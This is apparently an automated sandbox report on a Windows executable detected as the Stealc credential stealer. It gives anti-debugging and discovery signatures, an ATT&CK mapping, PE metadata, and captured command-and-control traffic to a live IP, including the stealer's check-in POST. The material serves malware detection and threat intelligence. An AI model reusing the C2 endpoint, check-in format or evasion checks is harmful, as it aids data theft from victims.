                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00184610 VirtualProtect ?,00000004,00000100,000000000_2_00184610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00199BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199AA0 mov eax, dword ptr fs:[00000030h]0_2_00199AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00197690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00197690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6976, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00199790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001998E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_001998E0
                Source: file.exeBinary or memory string: qProgram Manager
                Source: file.exe, 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: qProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C7588 cpuid 0_2_001C7588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00197D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00197B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00197B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001979E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001979E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00197BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00197BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.180000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1685626986.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6976, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.180000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1685626986.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6976, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.php/cfile.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.phpSfile.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/_file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.206/Zfile.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/6c4adf523b719729.phpkfile.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/6c4adf523b719729.php6file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.206jfile.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.215.113.206/4file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1685626986.0000000004F4B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.215.113.206
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1546392
                                      Start date and time:2024-10-31 20:47:04 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 3m 9s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:1
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 19
                                      • Number of non-executed functions: 134
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Stop behavior analysis, all processes terminated

                                      Warnings

                                      • VT rate limit hit for: file.exe

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.958956168907646
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:2'131'968 bytes
                                      MD5:508dc49e57681ea817bd36f9770ad609
                                      SHA1:d3cb94f703fa7549d47d9984393c34413bacb53f
                                      SHA256:bd37eb6db999d3f29ae806b66fb66d0f8e378b6b9169ecb9b7b7ed7308c0c7bf
                                      SHA512:5dca8c708215cddc174142685690b2335994990e14ab85f96dc8ba0279922dde2d0b85adf75a486d4ebe522403b9aa4cfd540d9be5f247b75d9a1dd6f22814b7
                                      SSDEEP:49152:bToLXXjGK8NYlw/xfL5tDm5myyEdDk1KrDmkVtg7v8UW/zN:fOaz3xf9ZyygrDlVtC8LL
                                      TLSH:40A533D618B8BB7CF35D8478C1AF8E817B78D6E431B87855A1BCA125907EE608C7DD08
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                      File Icon

                                      Icon Hash:90cececece8e8eb0

                                      Static PE Info

                                      General

                                      Entrypoint:0xb2a000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                      Entrypoint Preview

                                      Instruction
                                      jmp 00007FC070BA18AAh
                                      pcmpgtd mm4, qword ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add cl, ch
                                      add byte ptr [eax], ah
                                      add byte ptr [eax], al
                                      add byte ptr [0000000Ah], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+eax*4], cl
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add eax, 0000000Ah
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add bh, bh
                                      inc dword ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add eax, 0000000Ah
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add dword ptr [edx], ecx
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or dword ptr [eax+00000000h], eax
                                      add byte ptr [eax], al

                                      Rich Headers

                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      0x10000x2e70000x67600c9de7d5a05b197335af4beecae47c838unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      0x2ea0000x2a10000x20072b96ae7e5a5fdf85d4980358fb6c021unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      fefgvzwf0x58b0000x19e0000x19d80082805bc3dbc087ac2385ce6984e12934False0.9950002834038694data7.95427162698335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      bzufikti0x7290000x10000x400795d89c42825c015ea73c784d6d69549False0.7431640625data5.920891708898651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .taggant0x72a0000x30000x2200ec8751aa2ceb283588d5edfd71e77d50False0.06295955882352941DOS executable (COM)0.7969770357328125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Imports

                                      DLLImport
                                      kernel32.dlllstrcpy

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-31T20:48:00.319326+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 31, 2024 20:47:59.066549063 CET4973080192.168.2.4185.215.113.206
                                      Oct 31, 2024 20:47:59.071469069 CET8049730185.215.113.206192.168.2.4
                                      Oct 31, 2024 20:47:59.071542025 CET4973080192.168.2.4185.215.113.206
                                      Oct 31, 2024 20:47:59.071902037 CET4973080192.168.2.4185.215.113.206
                                      Oct 31, 2024 20:47:59.076656103 CET8049730185.215.113.206192.168.2.4
                                      Oct 31, 2024 20:48:00.016726971 CET8049730185.215.113.206192.168.2.4
                                      Oct 31, 2024 20:48:00.016822100 CET4973080192.168.2.4185.215.113.206
                                      Oct 31, 2024 20:48:00.019154072 CET4973080192.168.2.4185.215.113.206
                                      Oct 31, 2024 20:48:00.024128914 CET8049730185.215.113.206192.168.2.4
                                      Oct 31, 2024 20:48:00.319227934 CET8049730185.215.113.206192.168.2.4
                                      Oct 31, 2024 20:48:00.319325924 CET4973080192.168.2.4185.215.113.206
                                      Oct 31, 2024 20:48:04.415627956 CET4973080192.168.2.4185.215.113.206

                                      HTTP Request Dependency Graph

                                      • 185.215.113.206

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449730185.215.113.206806976C:\Users\user\Desktop\file.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 31, 2024 20:47:59.071902037 CET90OUTGET / HTTP/1.1
                                      Host: 185.215.113.206
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 31, 2024 20:48:00.016726971 CET203INHTTP/1.1 200 OK
                                      Date: Thu, 31 Oct 2024 19:47:59 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 0
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Oct 31, 2024 20:48:00.019154072 CET412OUTPOST /6c4adf523b719729.php HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBF
                                      Host: 185.215.113.206
                                      Content-Length: 210
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 36 30 38 34 46 37 43 45 39 30 33 32 30 34 39 37 30 30 37 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 2d 2d 0d 0a
                                      Data Ascii: ------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="hwid"06084F7CE903204970075------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="build"tale------CAEHJEBKFCAKKFIEHDBF--
                                      Oct 31, 2024 20:48:00.319227934 CET210INHTTP/1.1 200 OK
                                      Date: Thu, 31 Oct 2024 19:48:00 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 8
                                      Keep-Alive: timeout=5, max=99
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                      Data Ascii: YmxvY2s=


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:15:47:55
                                      Start date:31/10/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0x180000
                                      File size:2'131'968 bytes
                                      MD5 hash:508DC49E57681EA817BD36F9770AD609
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1685626986.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3.1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:2.9%
                                        Total number of Nodes:1327
                                        Total number of Limit Nodes:24
                                        execution_graph 36379 196c90 36424 1822a0 36379->36424 36403 196d04 36404 19acc0 4 API calls 36403->36404 36405 196d0b 36404->36405 36406 19acc0 4 API calls 36405->36406 36407 196d12 36406->36407 36408 19acc0 4 API calls 36407->36408 36409 196d19 36408->36409 36410 19acc0 4 API calls 36409->36410 36411 196d20 36410->36411 36576 19abb0 36411->36576 36413 196dac 36580 196bc0 GetSystemTime 36413->36580 36414 196d29 36414->36413 36416 196d62 OpenEventA 36414->36416 36418 196d79 36416->36418 36419 196d95 CloseHandle Sleep 36416->36419 36423 196d81 CreateEventA 36418->36423 36421 196daa 36419->36421 36421->36414 36422 196db6 CloseHandle ExitProcess 36423->36413 36777 184610 36424->36777 36426 1822b4 36427 184610 2 API calls 36426->36427 36428 1822cd 36427->36428 36429 184610 2 API calls 36428->36429 36430 1822e6 36429->36430 36431 184610 2 API calls 36430->36431 36432 1822ff 36431->36432 36433 184610 2 API calls 36432->36433 36434 182318 36433->36434 36435 184610 2 API calls 36434->36435 36436 182331 36435->36436 36437 184610 2 API calls 36436->36437 36438 18234a 36437->36438 36439 184610 2 API calls 36438->36439 36440 182363 36439->36440 36441 184610 2 API calls 36440->36441 36442 18237c 36441->36442 36443 184610 2 API calls 36442->36443 36444 182395 36443->36444 36445 184610 2 API calls 36444->36445 36446 1823ae 36445->36446 36447 184610 2 API calls 36446->36447 36448 1823c7 36447->36448 36449 184610 2 API calls 36448->36449 36450 1823e0 36449->36450 36451 184610 2 API calls 36450->36451 36452 1823f9 